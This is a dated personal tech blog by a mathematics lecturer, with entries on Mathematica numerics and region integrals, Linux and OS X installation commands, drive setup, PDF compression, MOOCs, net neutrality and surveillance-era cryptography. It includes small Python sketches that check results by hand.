OSX screenshot, Linux screenshot. October 10: Technical support says: "The results appear to be within the default PrecisionGoal. A function like NDSolveValue will generally return a result that is correct to many digits of precision, but for PDEs, the default PrecisionGoal is actually not very high (~4 or so). So for numerically difficult problems, you might not actually get very many good digits with default option settings, which is basically what appears to be happening here. Increasing the PrecisionGoal causes NDSolveValue to return the same result across all operating systems." Still interesting that this happens for a linear PDE which is completely solvable. I would have expected sensitive dependence on initial conditions (CPU dependence) only for more complicated nonlinear systems.
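For this particular equation one can bypass the numerics entirely. With fixed ends and the modes sin(7 pi x) and sin(5 pi x), separation of variables gives u(t,x) = cos(7 pi t) sin(7 pi x) + (1/pi) sin(5 pi t) sin(5 pi x). At (t,x) = (0.4, 0.3) the second term vanishes since sin(2 pi) = 0, and the first is sin(0.1 pi) cos(0.8 pi) = -sin(18°) cos(36°) = -1/4 exactly. So both platform answers were correct only to three or four digits, consistent with the PrecisionGoal explanation. A quick check in plain Python (my own sketch, independent of Mathematica):

```python
import math

def u(t, x):
    """Exact solution of u_tt = u_xx with u(0,x) = sin(7 pi x),
    u_t(0,x) = 5 sin(5 pi x) and u = 0 at x = 0 and x = 1."""
    return (math.cos(7 * math.pi * t) * math.sin(7 * math.pi * x)
            + math.sin(5 * math.pi * t) * math.sin(5 * math.pi * x) / math.pi)

print(u(0.4, 0.3))   # -0.25 up to floating point rounding
```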
19-09-2014: Tweet-a-program by Wolfram is a great thing, as Mathematica allows for very short code snippets. I had tried some tweets earlier: here in the dynamical systems lecture, this tweet on a linear algebra result, or for a multivariable class. See the Tweet.
17-09-2014: Installed iOS 8 on the iPhone. A scare: the phone now requires password protection, and the password must not be an ascending sequence nor contain repeated digits. After booting up the first time, the user is not told that, and the old password does not work any more. I first thought I was locked out forever, as my favorite phone passwords included repeated digits or simple ascending or descending sequences I can enter quickly.
14-09-2014: About the MOOC revolution. Like any technology, it is going to stay in the mix of education. It has actually been there for a long time already. As a teen I already followed TV courses in physics, which were essentially MOOCs distributed by TV and which came with textbooks and exercises. Modern MOOCs are actually quite close to this old-fashioned TV instruction. They just make use of new peer and web technology, similarly as "the cloud" is a modern incarnation of the good old "mainframe computers" but with new technology. The article mentions the problem with engagement. Another problem is authenticity. Like an old TV show, a year-old YouTube video, a pre-recorded, shelved lecture is hardly exciting. There is a lifetime for everything. For good textbooks like Feynman's lectures, the shelf life can be several dozen years. Good pre-recorded lectures of TED quality can still be watchable for a couple of years. But the shelf life of a pre-recorded lecture by an average university teacher is much shorter. Would I want to listen to a lecture given in 2010? Heaven forbid, except if it is a historical lecture or given by somebody with name recognition (and then the interest is mainly in the person and not the subject). Cold coffee is poison for learners!
01-09-2014: I love Ubuntu, but it can sometimes be frustrating. Example: one needs to jump through some hoops to install standard programs like Acrobat or Google Earth. For Google Earth, for example, one needs to install the 32-bit version. I tried for hours to get the 64-bit version to work (using help from Stack Overflow), but with no success. Only the 32-bit version works, and it needs the following temporary software repository change:
 sudo apt-get install libc6:i386
 sudo -i
 cd /etc/apt/sources.list.d
 echo "deb http://archive.ubuntu.com/ubuntu/ raring main restricted universe multiverse" > ia32-libs-raring.list
 apt-get update
 apt-get install ia32-libs
 rm /etc/apt/sources.list.d/ia32-libs-raring.list
 apt-get update
 sudo apt-get install gcc-multilib
Later, I found an easier way here:
 wget http://dl.google.com/earth/client/current/GoogleEarthLinux.bin  
 chmod +x GoogleEarthLinux.bin  
 ./GoogleEarthLinux.bin 
Acrobat does not even mention Linux versions anymore. Yes, there are alternatives like xpdf, but it lacks features like double-page view. Fortunately, "evince" has finally become stable enough. Still needed is a built-in PDF viewer with the power of "Preview" in OS X, which allows one to rotate pages, copy and paste pages, and shuffle or crop pages. There is a decent free Master PDF editor from here, which can be installed quickly:
 wget http://code-industry.net/public/master-pdf-editor_1.9.25_amd64.deb
 sudo dpkg -i master-pdf-editor_1.9.25_amd64.deb
03-08-2014: Mathematica 10 has a nice new feature allowing one to integrate over geometric figures. Funny that the documentation indicates that the result of Integrate[1,{x,y,z} \[Element] Sphere[]] is 4Pi/3, even though the correct command for that value is Integrate[1,{x,y,z} \[Element] Ball[]]. Obviously this was only fixed after the documentation was written. The Sphere integral correctly gives the surface area of the sphere. [Update: shortly after, the documentation has been corrected.]
13-07-2014: Upgraded some machines to Mathematica 10 already. I was a bit concerned about my large graph theory library (8000 lines of very densely programmed code). There was only one incompatibility: Mathematica 10 now has ChromaticPolynomial back (before, it had to be hacked from the Combinatorica package in an ugly way: since Combinatorica was incompatible with almost everything, I had to let Mathematica write a fresh Mathematica program, run it to evaluate ChromaticPolynomial and read the result back. Fortunately, this hack is no longer needed). There are quite a few new functions also in graph theory. With one of them, I already managed to crash Mathematica (on a MacBook Air). One now has, for example, embedding options in higher dimensions: GraphEmbedding[HypercubeGraph[5],"SpringEmbedding",5]. For calculus courses, it will be nice to use transformations like G=FunctionRange[{{x-y,x^2-y^2},x^8+y^8<1},{x,y},{u,v}]; RegionPlot[G,{u,-2,2},{v,-2,2}]. Also RegionPlot in 3D has become better, like RegionPlot3D[x^4*y^2-z^2+x^2*y^2<0,{x,-3,3},{y,-3,3},{z,-3,3}]. As we are just covering Lagrange next week in the summer school course, there is also news: ArgMin[x^2 - x y^2,{x,y} \[Element] Disk[]] or ArgMax[x^2+2y^2+z^2, {x,y,z} \[Element] Sphere[]] find the extrema of a function on a geometric object. Here is something relevant to our first midterm exam: A=Line[{{0,0,0},{1,1,1}}]; B=Line[{{3,2,4},{2,4,2}}]; ArgMax[EuclideanDistance[x,y],{x \[Element] A,y \[Element] B}]. Next week, we will also start with integration. Also here, some cool new stuff: Integrate[x^2+y^2,{x,y,z} \[Element] Sphere[]] computes the moment of inertia of the sphere.
Note that this is different from the moment of inertia of the unit ball, which is computed with Integrate[x^2+y^2,{x,y,z} \[Element] Ball[]]. We can also place the ball somewhere else and change the radius: Integrate[x^2+y^2,{x,y,z} \[Element] Ball[{4,1,3},2]]. And here is the volume of a tetrahedron given by four points: Integrate[1,{x,y,z} \[Element] Tetrahedron[{{1,1,1},{2,2,2},{6,3,3},{3,1,2}}]]. A great tool for writing new integration problems! There are various other things, like MandelbrotSetPlot[{0.3I,0.3+I}], plotting the Mandelbrot set in a rectangle given by 2 complex numbers, or JuliaSetPlot[-1.2]. A bit creepy is the command GeoGraphics[GeoMarker[],GeoRange -> Quantity[100, "Meters"]], which plots a map of where you are.
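These region integrals are easy to sanity-check. The moment of inertia of the unit ball about the z-axis is Integrate[x^2+y^2, Ball[]] = 8 Pi/15; a crude Monte Carlo estimate in plain Python (my own sketch using rejection sampling from the cube [-1,1]^3, not a Wolfram API) reproduces it to a couple of digits:

```python
import math, random

def ball_moment(n=200_000, seed=42):
    """Monte Carlo estimate of the integral of x^2+y^2 over the unit ball."""
    rng = random.Random(seed)
    total = 0.0
    for _ in range(n):
        x, y, z = (rng.uniform(-1, 1) for _ in range(3))
        if x*x + y*y + z*z <= 1:      # keep only points inside the ball
            total += x*x + y*y
    return 8.0 * total / n            # the sampling cube has volume 8

print(ball_moment(), 8 * math.pi / 15)   # both around 1.6755
```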
28-05-2014: With my own book library reaching 160 Gig of texts, reducing size is crucial. It's amazing how much the arXiv can compress PDFs. See for example this marvelous book, which is down to 11.8 Meg but still has stellar quality. When opening it under OS X with Preview, removing a few pages and storing it again, the size explodes to over 100 times the original. I tried to compress it again with Acrobat, and it is still 48.8 Meg, more than 4 times the original size. I can bring it down to 18 Meg with the "gs" command line, but the result is terrible, as typical jpg artefacts can be seen. Having seen that the Internet Archive uses commercial software from LuraTech, I tried the LuraTech PDF Compressor Desktop. It installs and runs under wine in Linux but refuses to finish the conversion. Having a high quality PDF compressor should be a high priority both under OS X and Linux. Well, use djvu then! While I adore djvu, the djvu readers are unfortunately still bad and equipped with strange interfaces, especially on tablets, so that I prefer PDFs.
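For reference, the "gs" route boils down to Ghostscript's pdfwrite device. A tiny Python helper (a hypothetical wrapper of mine, assuming Ghostscript is installed as gs) that assembles the command line; the -dPDFSETTINGS presets (/screen, /ebook, /printer, /prepress) control how aggressively embedded images are recompressed and downsampled, which is exactly where the jpg artefacts come from:

```python
import subprocess

def gs_compress_cmd(src, dst, quality="/ebook"):
    """Assemble a Ghostscript call that rewrites a PDF with recompressed,
    downsampled images; quality is /screen, /ebook, /printer or /prepress."""
    return ["gs", "-sDEVICE=pdfwrite",
            "-dPDFSETTINGS=" + quality,
            "-dNOPAUSE", "-dBATCH", "-dQUIET",
            "-sOutputFile=" + dst, src]

# subprocess.run(gs_compress_cmd("book.pdf", "book-small.pdf"), check=True)
```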
26-05-2014: Strange incident with truecrypt, a safe and reliable piece of software I have used for many years. It could have been hacked, could have been forced to close doors, or auditing might have found something. Mysterious.
22-05-2014: Installed Ubuntu 14.04 at home and in the office. Best Ubuntu ever. Glad they focused on stability rather than features. The reason for upgrading was also prophylactic: I like to refresh the drives from time to time, even though one worries too much. But I'm fanatic about having an extremely responsive system and not having to sysadmin my machines during the semester. A screenshot of the screen right now. To make a mountable Ubuntu USB installation stick from the command line on a MacBook Air:
 hdiutil convert -format UDRW -o ubuntu.img ubuntu-14.04-desktop-amd64.iso
 diskutil unmountDisk /dev/disk1
 sudo dd if=ubuntu.img.dmg of=/dev/rdisk1 bs=1m
Moved all internal drives over to 3 TB drives (now mainstream and under 100 dollars), while the operating system is still on the fastest available SSD. Copying over costs about 12 hours with rsync. Having / and /home on different drives has become trickier, as Ubuntu now locks you out if /home is on another drive on which .Xauthority etc. are not present. One first has to sync the newly built default user files over to the home folder on the other drive and then edit /etc/fstab to mount it on /home. Formatting 3 TB hard drives no longer works with "fdisk", as the latter only produces 2.2 TB file systems. "parted" now builds the partitions: in my case "parted /dev/sde", then enter "mklabel gpt" and "mkpart pri 1 -1". To build the ext4 filesystem, the command "mkfs.ext4 /dev/sde1" still works. I would not buy the Western Digital "Intellipower" drives any more. They are definitely slower: "hdparm -t /dev/sdd1" gives: Timing buffered disk reads: 504 MB in 3.01 seconds = 167.31 MB/sec, while "hdparm -t /dev/sdc" gives: Timing buffered disk reads: 340 MB in 3.01 seconds = 113.10 MB/sec; the speed factor is essentially the 7200/5400 RPM factor. For the backup drive, a green drive makes sense, but not for the main drive.
19-05-2014: Cool Google Rubik Doodle.
13-05-2014: An interesting analogy between network neutrality and the degeneration of California utilities in the 1990s. Slowing down or reducing the service to force people to upgrade or pay more is a strategy one sees implemented in other places too: our town of Arlington recently put the garbage and recycling business in the hands of the private company JRM. They often refuse to take things and put stickers on the usual trash ("this is recycling"), while the recycling truck does not pick it up either. It is aggravating. Similarly with the internet, where packets are no longer picked up and movies start to stutter.
09-05-2014: A strange networking problem at home drove me almost insane. Wireless connections to the laptops would sometimes work and sometimes not. Reconfiguring all networking and removing /Library/Preferences etc. did not work. I changed and re-changed the ARP tables, DNS tables, firewall settings etc. Nothing helped reliably. I reinstalled OS X: even then, the wireless sometimes worked, then no more, as if an evil switch would randomly turn on and off. Since TP-Link routers had been compromised a while ago, I also investigated the new AC1750 TP-Link router. But nobody had tampered with the DNS server settings there, and that router is safe. Finally, I wiped the hard drive clean, reinstalled Lion, then Mavericks again, and restored the old stuff (except configurations) from the Time Machine. Again, the same story. I brought in a second identical MacBook Air and compared all network settings line by line; one would work, the other not. Then the other would work, etc. Finally, I looked over the router again. I had not seen that I had carelessly configured two wireless channels with the same SSID and password, where one was the guest network. What had happened was that every time a laptop attached, it landed either on the wireless network directly (allowing local networking) or on the guest network (not allowing local networking).
05-05-2014: Google also gets into the classroom. As usual with free services: how long will it take until it is shelved in a spring cleaning? How long will it stay free without advertisement? Are submitted work and grades kept private forever, or internally reused for other purposes in the future? As usual with technology, there are other concerns: for example, that outsourcing technology destroys local IT culture and makes schools even more dependent on "big brothers".
26-04-2014: Net neutrality seems to end and send the web down the tubes.
31-03-2014: A Heise article shows that iBeacon is used to track students or customers in shops. Article. The app: BeHere: "Using proximity, teachers can automatically identify which students are accessing the classroom, and easily manage help requests using an ordered line, always up-to-date". Simply terrible. It assumes everybody must have a smartphone with Bluetooth enabled.
29-02-2014: Articles like this ask whether Netflix is throttled by internet providers. The answer is a clear yes. Netflix has recently become unwatchable on Verizon FiOS. Net neutrality is already dead. It's no longer a nightmare scenario; it is a nightmare already. By the way, the throttling affects not only Netflix. When Comcast throttled my SSH traffic (which includes rsync) 5 years ago, I switched. I am considering dumping Verizon for everything now, phones included.
18-02-2014: SoylentNews, an alternative to Slashdot, resembles the Slashdot of 15 years ago. The question is whether it can succeed in growing without needing to cash in. Currently, it looks great and has a good community, like Slashdot 15 years ago.
14-02-2014: A lot has been written for the 30th anniversary of the Mac. An article about Niklaus Wirth, who introduced the Pascal, Modula and Oberon programming languages and the Lilith computer. I had seen the machine demonstrated when I was a student. This was before the first Mac appeared, and it was the first time I saw a mouse on a personal computer. The vertical screen looked perfect for programming. I loved Pascal because of its elegance, but soon after, Wirth would introduce Modula, Modula-2 and then Oberon. Wirth would make the languages more and more elegant, destroying backwards compatibility and convenience, and so rendered them unpopular: no programmer wants to work with a programming language which has a half-life of 5-10 years.
13-02-2014: Shiny names are important in marketing. Since the "Semantic Web" hype promised about 10 years ago did not globally work out (semantic services are easier to "game" and "cheat with", require trust, and were instead replaced by social peer mechanisms), NYT journalist John Markoff came up with the name Web 3.0. This too is not new: when Web 2.0 was flashy, a few were already talking about Web 3.0. Now there are already predictions about Web 4.0, as in this graph. What John Markoff called the Semantic Web is just refined artificial intelligence, which exists already. The mistake which crystal ball readers make is to assume that this is all new: the "holy grail" is already implemented to a large degree. Search engines are no longer just directories, and computer algebra systems are no longer just calculators. With search engines, we can already get answers to complex questions, similarly as computer algebra systems do. When a couple of students experimented with me on chat bots in education, this had been ridiculed, but already then, bots were roaming industries answering customer questions and gaming sites to make a buck. Already in 1998 I saw a talented student build, in a few hours, a bot which would play poker online by reading and OCRing the content from the screen and clicking in the right places. Now, bots swarm gaming places like World of Warcraft en masse. What the graph shows as Web 4.0, with intelligent personal agents, has already been realized a long time ago. By 2020 it will just be even more important. There are other things which the above graph gets wrong. Directory portals are much older than Web 2.0. Everybody who has used Gopher or Usenet services knows that these existed at the very beginning. Semantic search (touted as part of Web 3.0) has long been here. It has already become a nuisance, as we live in search bubbles: engines collect "context" in order to answer questions better.
Depending on previous searches, reading habits or location, they assume they know what you want. This can be irritating. The semantic web has become a nuisance. Instead, we want more of the persistent and open web, where information is stored in the open, remains there, and is not hidden in opaque databases or services and moved around whenever a new look is smacked onto a website. Wikipedia is an example of how it should be done: persistent links which are intelligible and can be referred to from other pages without having to rewire everything. What John Markoff in 2006 called an example of a question, "I'm looking for a warm place to vacation and I have a budget of $3,000. Oh, and I have an 11-year-old child", can of course never be answered without context: the answer clearly depends on where one lives, what "warm" means and how much adventure one wants; it can already be answered easily by knowing some basic geography as well as looking up some travel sites. It's all about marketing: "mainframes with dumb terminals" (which existed before the PC) does not sound as nice as "the cloud with smart phones". The latter reinvented the former. And "replacing humans with robots" is also not as good a selling point as "building a semantic Web 3.0". But since predictions about the future of technology have almost always been completely wrong, this might also be the case here.
08-02-2014: Flappy Bird seems to go down after it has become a phenomenon. It's an old type of game, but because it is so insanely hard, it had become famous. It reminded me of an old copter game I had played on my old NeXTstation already. I played Flappy Bird only briefly before getting frustrated. Achieving this was just the point of the game. The copy-cats will no longer succeed, because the novelty is gone: with Flappy Bird one could say "hey, try this, can you get more than 10 points" and have a good laugh. This is how the game went viral. The originality here was not the game type: it had many predecessors, but the insanity of its difficulty made it unique. What makes a good game is difficult to say: chess, go, the 15 puzzle, Rubik's Cube and Monopoly are all original from the ground up, and the 15 puzzle as originally designed was ingenious (switching two squares makes it impossible to solve). It's maybe as with art. Oppenheim's art object "Déjeuner en fourrure" is genius. Knock-offs are often only kitsch. The boundaries are difficult to draw. The meat dress of Gaga, for example, is a knock-off of Jana Sterbak, which I had once seen myself in an exhibit. Gaga made it something new by actually wearing it and not only showing it as an exhibit or photograph.
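The parenthetical remark about the 15 puzzle can be made precise: for a 4x4 board, a position is solvable exactly when the inversion parity of the tiles matches up with the parity of the row of the blank, counted from the bottom. Swapping just two adjacent tiles flips the inversion parity while leaving the blank in place, so the swapped position can never be solved. A small Python sketch of the classical criterion (my own illustration):

```python
def solvable(board):
    """Solvability test for the 4x4 fifteen puzzle.
    board: 16 numbers in reading order, 0 marking the blank."""
    tiles = [t for t in board if t != 0]
    # count inversions: pairs of tiles appearing in the wrong order
    inversions = sum(1 for i in range(len(tiles))
                       for j in range(i + 1, len(tiles))
                       if tiles[i] > tiles[j])
    row_from_bottom = 4 - board.index(0) // 4   # bottom row counts as 1
    # even board width: solvable iff inversions are even exactly when
    # the blank sits on an odd row from the bottom
    return (inversions % 2 == 0) == (row_from_bottom % 2 == 1)

solved  = list(range(1, 16)) + [0]                    # 1..15 in order
swapped = solved[:]
swapped[13], swapped[14] = swapped[14], swapped[13]   # swap tiles 14 and 15
print(solvable(solved), solvable(swapped))            # True False
```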
07-02-2014: A comparison of Slashdot beta with classic Slashdot illustrates how another user-driven news site is going to be ruined. It is a consequence of the site having been acquired by the career website Dice. Nothing was learned from previous disasters. Slashdot now tries to look like Slate, but has problems similar to most mobile versions of websites: the user is chained and slowed down by pictures, more advertisement and white space. The problem is that Slashdot has moved into a news sector which is already heavily populated: most news websites have moderated and peer-reviewed comment sections in their articles. Digg peaked around 2007 and is now almost down to nothing. It sold out its content to advertisers and crashed. Funny that Digg now looks very similar to the new Slashdot beta: a more corporate look. Facebook and YouTube seem to have peaked too, as they start to cash in, sell out, and milk the audience with more and longer advertisements.
06-02-2014: A Register article discusses reliability issues with cloud services, showing that most services have outages. It illustrates how IT centralization increases the risk of a global meltdown. Yes, prices are going down, but probably only in order to kill the competition. Once everybody is hooked, the prices can go up again. Having your data accessible to third parties is another issue. But even more problematic is the increased dependence on reliable broadband connections. This is already now almost in a monopoly state, with poor service and high costs. We get a taste of the toxic mix already: since everybody has their Dropbox accounts syncing at Starbucks, the internet experience in such coffee houses is often that of the telephone modem era. And just a month ago, an appeals court killed the net neutrality rules. A nightmare scenario is to have ISPs and cloud services eventually merge, with ISPs giving preference to their own data.
20-01-2014: There has been a lot of discussion about interface questions for Windows and Ubuntu. There are two important points which make the paradigm change impossible. First, tablets are mainly one-task devices: you run one application. This is good for consumption or single tasks like drawing something, but for most work it is not an option. Typically, in any creative work where several sources need to be considered and different tools used, it is crucial to be able to customize multitasking. For scientific work, for example, there is code to be run, literature databases to be updated, texts to be written, information to be consulted, etc. Also, in any operating system, it must be easy to access all the available programs from a menu. A dock like in OS X is sufficient. A second issue is psychological. The tiles distract from work. I like to come to the computer and have tabula rasa; all documents and projects are at their places. I don't need them on the workspace. It's like coming to the office and having first to get rid of newspapers, TVs, piles of letters, reminders, books. For the tablet, on the other hand, I like its reduced capabilities and the one-task-at-a-time principle. I can use it to read a book, surf the web, or sketch some ideas on a notepad (I use the tablets more and more as notebooks, like paper, but strangely, it never worked for preparation notes for lectures, where paper is superior). I have myself been seduced twice into buying fancy keyboards for the iPad. Never used. Most of the time I "read" email on the iPad but "answer" only when on a computer. Exceptions are urgent things on the road, when reading on the phone. The decisions for such interface changes have clearly been strategic: to have "one ring" to "bind them all".
24-12-2013: An upgrade to Ubuntu 13.10 with a fresh install onto a new SSD led to sound, networking and dependency problems. Within half a day, I moved over to Mint, which worked out of the box. I still use the blackbox window manager and "xv", which uses old libraries: "sudo ln -s libtiff.so.5.1.0 libtiff.so.4". The usb-creator-gtk had failed to create the bootable USB stick, but "sudo dd if=~/linuxmint-16-cinnamon-dvd-64bit.iso of=/dev/sdg oflag=direct bs=1048576" worked. [Update: Mint's MDM memory footprint is huge (I need the memory for Mathematica); Acrobat installation from Adobe failed; adding "deb http://archive.canonical.com/ quantal partner" to "/etc/apt/sources.list.d/additional-repositories.list" and running "apt-get update", "apt-get install acrobat" reproduced the "C:\nppdf32Log\debuglog.txt" bug seen in earlier Ubuntus.]
23-12-2013: Will Adobe succeed with Cloud subscriptions? For me, it will never be an option, because any "cloud solution" is a "chain solution" making you dependent. Having purchased the Adobe suites a couple of times in my life, this is the end. The Gimp is better but still has many features missing, like warp and liquify tools. After the customer backlash, competitors thrive. On the Mac, Pixelmator has become much better. Having used it since the first version six years ago, the liquify tools are getting real, and 3.0 FX looks like a serious competitor for Adobe, especially since it is reasonably priced (less than one month of an Adobe subscription) and because the application starts up fast. Opening Adobe products started to feel like booting up a virtual machine.
20-12-2013: Winter office: producing grades.
18-12-2013: A pretty good account of the anonymous email scare last Monday. (It had been an interesting day.)
11-12-2013: A NYT article about MOOCs mentions some statistics released by the Penn GSE press room: no surprise at all. Only half of those who registered ever actually viewed a lecture, and only 4 percent completed the course. This is not new. When I was a kid, there were already MOOCs, but on TV. It was called "Telekolleg" (an example), which came with a book and TV lectures. I myself took an electronics course in high school, but also only did part of it and did not take the exam. I learned most about electronics by building and doing things, of course mostly according to a plan but also without. In an online experience it is difficult to keep the pressure going and to set time aside. Another problem to consider with MOOCs (as with Telekolleg) is that courses race to the bottom and focus on trivialities in order not to lose students. But like Telekolleg on TV, MOOCs will not go away. Similarly as libraries or TV have not replaced the classroom, the web does not replace the lecture hall. But it can complement it. From page 20 of our article on 3D printing in education: "We witnessed 3 revolutions: "new math" brought more advanced mathematics to the classroom of generation X. Calculators and new tools like the overhead projector or Xerox copying tools amplified these changes. 20 years later came the "math wars". It affected generation Y and also contained both content and philosophy shifts as well as technological earthquakes like the widespread use of computer algebra systems and the world wide web. Again 20 years later, now for generation Z, we see social media and massive open online courses changing the education landscape. We have currently no idea yet where this is going, but looking back at the other revolutions, it is likely that the soup is again eaten colder than cooked: social media start to show their limitations and the drop-out rates for MOOC courses can be enormous. Revolutions are often closer to convolutions.
Fortunately, future generations of teachers and students can just pick from a larger and larger menu of tools. What worked will survive. But some things have not changed over thousands of years: an example is close student-teacher interaction. It's a bit like with Apollonian cones, which were used by the Greeks in the classroom already. They are still around. What has changed is that they can now be printed fast and cheaply. For a student, creating and experimenting with a real model can make as big an impression as the fanciest 3D visualization seen with the latest virtual reality gaming gear." [A Slate article]
25-10-2013: Until recently, it had been fun to look at the YouTube charts, which ranked videos according to popularity. Now they are gone. Why the manipulation? Maybe because of a YouTube Music Award? Recent screenshots 1, 2 of charts with the most watched and shared videos on September 14, 2013. YouTube has now become closer to TV, where content is presented in a form which can be sold. Did Google not learn from disasters like Digg, where content manipulation killed a once successful venture? I would prefer that they bring back the old YouTube charts, driven by pure numbers. The current setup looks worse.
21-10-2013: Got the new OS X Mavericks installed on a laptop and iMac. Runs smoothly. Optically, only the new gray background of the dock bothers me. In general, it would be nice to be able to customize the look of the desktop more. The new OS nags more about iCloud. Otherwise things are pretty much the same and most applications run faster and smoother. I was eager to try Keynote 2013. The interface of the software has radically changed. Almost nothing is the same. Fortunately, Keynote never needed any manual and relearning how to do things took only minutes. After half an hour, it was clear that one needs to be careful when using Keynote 2013 for old presentations. It can distort and damage: embedded movies need to be converted, and the geometry of the slides, fonts, pictures etc. can change. The first presentation I tried was completely ruined. The culprit was "optimizing for iOS", which virtually destroyed the geometry of the slides in an unrepairable way. New again: Keynote files are folders and not compressed files. Two other small surprises: to use Mathematica, Java SE 6 needed to be installed, and for running command-line tools like "convert", a reinstall of XQuartz was required. [Update: October 27, 2013: Mavericks has without warning changed display settings for external monitors. This needs to be checked before going into a lecture. I was stranded on Friday for a minute until the display worked. Battery life has decreased considerably, I believe. Also, there are still problems with updating icons on the desktop. One thing I miss a lot in the new Keynote is the "magic alpha" wand, and in general the very sparse menu bar. One has to dig several times to change basic things like font color. Otherwise, the upgrade is not too bad.]
21-10-2013: Got as a birthday present an upgrade of the home network. The new ASUS RT-AC66U router uses 802.11ac, reaching 1.75 Gbps, and makes wireless considerably faster. My newest MacBook Air already uses 802.11ac, so it already matters. Here is a review of the router, and I can confirm that it is a nice piece of hardware and also small. How do they do the trick? It seems the multiple antennas are key. But also the Ethernet home network has sped up considerably. The configuration interface is nice and I also attached a spare 1 TB hard drive for global media access (books and movies). One hiccup: my wireless printer does not work with WPA2 and I had to wire it with USB for now.
12-10-2013: It is the rate of change which matters, when looking at national debt.
12-10-2013: After a hard drive failure in an iMac, I replaced it with a 1 TB SSD drive, my first of this size. They are still a bit expensive (500 bucks), but worth it. The install in an older iMac is not too easy. I slightly damaged the cables attached to the monitor when rewiring things. Since reinstalling the OS did not work with the recovery setup and my Thunderbolt drives were not yet ready for that Mac, I needed to install OS X from my laptop onto an external USB hard drive, then use that to install. Since the SSD has no temperature sensor, the fan of the iMac was always running at full speed. An HDD fan-control app helped. And now that old iMac is a quiet and fast machine, and delays from moving platters are gone.
21-9-2013: This message reminds me of error messages of early Windows versions. What happens if one clicks "Delete from Mac"? Apple really seems to want all your documents in the cloud.
19-9-2013: Both URL-shortened links and QR codes have been abused so much that users do not trust them any more. This sums it up. Would anybody click on http://goo.gl/fnOVbZ or scan a picture like that? Both correspond to licking a toilet seat. It's amazing how fast technology can be destroyed these days. URL shorteners are used by spammers to hide their bait and QR codes are used by rogue marketers or stock market pushers.
18-9-2013: Google's Foucault pendulum animation (local copy) illustrates nice JavaScript technology which before was done in Flash only. What I always liked about JavaScript is that one can see the source code.
17-9-2013: A recent factorization of RSA keys illustrates how important pseudo-random number generators are. From the paper: "It is clear that the random-number generator inside the chip hardware is frequently stuck in a short cycle." It recommends: "We strongly recommend that the chip manufacturer publicly disclose full details of the RNG hardware in use and provide copies of the RNG hardware to researchers". See also this NYT article or a discussion here which points to an interesting story about elliptic curves.
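The danger of a repeating RNG can be made concrete with a toy computation (the primes below are invented for illustration and are of course far smaller than real key sizes): if two RSA moduli accidentally share a prime because the generator produced it twice, Euclid's algorithm recovers that prime instantly, with no factoring effort at all.

```shell
# Toy illustration with made-up small primes: two moduli n1, n2 that
# share the prime p because a weak RNG produced p twice.
p=10007; q1=10009; q2=10037
n1=$((p * q1))
n2=$((p * q2))
# Euclid's algorithm: gcd(n1, n2) reveals the shared prime directly.
a=$n1; b=$n2
while [ "$b" -ne 0 ]; do
  t=$((a % b)); a=$b; b=$t
done
echo "shared prime: $a"   # prints: shared prime: 10007
```

With the shared prime known, both moduli are factored and both keys are broken; this is exactly why the paper's scan of many public keys was so devastating.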
06-9-2013: After new revelations about backdoors in encryption standards, this should be a stronger push for open source products and stronger encryption algorithms based on mathematically difficult problems. Maybe one could fund a prestigious prize for finding deliberately planted backdoors in software or flaws in random number generators, and help humiliate anybody building or selling flawed software. Relying on mathematically difficult problems is probably the safest way to keep a privacy layer intact, and having such a layer is essential for banking, health care, diplomacy or business. It is unlikely that agencies like the NSA or GCHQ have mathematical breakthroughs before academia, and if so, only marginal ones (this is illustrated in Levy's book "Crypto"). Schneier ends his article with "I trust in Mathematics" and backs it up with historical developments in cryptanalysis. Yes, GCHQ had the idea of Diffie-Hellman key exchange a few years before the idea popped up in academia, but it was close. Schneier mentions differential cryptanalysis, which was known by agencies before Biham and Shamir. But also there, it had been close. Schneier: "The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and 11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program." Actually, this is important work, because the more people think about these mathematical problems without cracking them, the more secure they will become. It is likely that mathematics will prevail and win the internet back. To cite from page 137 in Levy's book: "The midseventies had already been traumatic for the NSA". Let's hope mathematics will render the third millennium a trauma for any snooping agency.
30-8-2013: Slashdot has a story about the latest MOOC in calculus. Nice that it is open source. Some of the problems are interactive examples using the Raphael JavaScript vector library. Not everything works yet, like sound (which works in Chrome but not Firefox). It's nicely done.
26-7-2013: The Gimp image manipulation program constantly evolves. In general, it got better and better. One recent change from 2.6 to 2.8 drives me nuts: in order to make a simple change to a jpg file and resave it, one now has to go through a couple of extra clicks. About 90 percent of the time, one just runs "gimp file.jpg", changes something like cropping, rescaling or brightness, then resaves it. Now, one has to choose "overwrite" or "export" and reaffirm that one does not want to save it in Gimp's native format. There is a thread about it on the Gimp forum. Reactions like "then you should be using simpler software" are exactly the kind of arrogance which has killed many open source projects.
01-7-2013: My office desk:
08-6-2013: The tapping scandals have not produced a lot of outrage. We all "knew". But it is bad for business. One can cite: "That is the atomic and subatomic and galactic structure of things today. And you have meddled with the primal forces of nature." Why is it bad for business? Because it undermines trust. Any business needs to keep some information private in order to stay competitive. And nobody in his right mind will do business with companies which might leak information. If it is given out to government, it can also reach the competition. Until this mess is solved by Congress, customers will avoid US businesses with their data. [Update: November 3, 2013: The damage for Silicon Valley is estimated to be 35-180 billion dollars.
12-6-2013: Follow-up: the Prism scandal makes a lot of headlines abroad. It is a PR disaster for US companies. Why is it bad that data are in principle readable by third parties? For smaller companies, it means that the competition can catch up faster than expected. For individuals it means that medical records or communications with doctors could lead to workplace discrimination, and that financial data and stock markets are easier to manipulate for individuals who have access to insider data like telephone records between CEOs or board members. It means espionage becomes simpler. It also means that political assassination or extortion is easier and diplomacy becomes more difficult. Wikileaks should have taught a lesson: there are some conversations in diplomacy which are better not public. If a government lowers the standards for privacy, it should not be surprised when sensitive information, like information about hacking other governments, gets public too. If a government lowers the standards about torture, its own forces risk being tortured.]
